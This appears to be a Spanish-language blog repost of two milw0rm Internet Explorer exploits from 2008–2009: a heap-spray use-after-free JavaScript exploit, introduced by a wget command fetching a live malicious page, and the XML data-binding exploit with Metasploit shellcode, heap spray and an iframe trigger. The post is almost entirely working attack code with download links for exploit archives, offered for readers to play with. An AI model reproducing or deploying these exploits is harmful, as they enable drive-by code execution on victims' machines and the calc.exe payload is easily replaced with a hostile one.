wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
-->

<script language="JavaScript">

var c="putyourshizhere-unescaped";

var array = new Array();

var ls = 0x100000-(c.length*2+0x01020);

var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xC0; i++) {
	array[i] = lh + c;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function ok() {
	o1=document.createElement("tbody");
	o1.click;
	var o2 = o1.cloneNode();
	o1.clearAttributes();
	o1=null; CollectGarbage();
	for(var x=0;x<a1.length;x++) a1[x].src=s1;
	o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>

# milw0rm.com [2009-02-18]

Dos pequeños pero muy lindos Xpl0itZ

Publicado por zerialkiller en exploits con 1 Comentario

Estos exploits ya tienen algun tiempo que fueron publicados en http://www.milw0rm.com/ hasi que espero ya allan jugado lo suficiente con ellos como yo.

// k`sOSe 12/10/2008 – tested on winxp sp3, explorer 7.0.5730.13

// windows/exec – 141 bytes
// http://www.metasploit.com
// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe

http://milw0rm.com/sploits/2008-iesploit.tar.gz

# milw0rm.com [2008-12-10]
——————————————————————————————————————————————————–

<html>
<script>

	// k`sOSe 12/10/2008
	// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
 	// Heap spray address adjusted for Vista - muts / offensive-security.com
	// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
	// http://www.offensive-security.com/0day/iesploit-vista.rar
	// windows/exec - 141 bytes
	// http://www.metasploit.com
	// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
  	var block = unescape("%u0c0c%u0c0c");
	var nops = unescape("%u9090%u9090%u9090");

	while (block.length < 81920) block += block;
	var memory = new Array();
	var i=0;
	for (;i<1000;i++) memory[i] += (block + nops + shellcode);

	document.write("<iframe src=\"iframe.html\">");

</script>

</html>

<!-- iframe.html

<XML ID=I>
	<X>
		<C>
			<![CDATA[
				<image
					SRC=http://&#3084;&#3084;.xxxxx.org
				>
			 ]]>

		</C>
	</X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
	<XML ID=I>
	</XML>

	<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
	</SPAN>
</SPAN>

-->

# milw0rm.com [2008-12-10]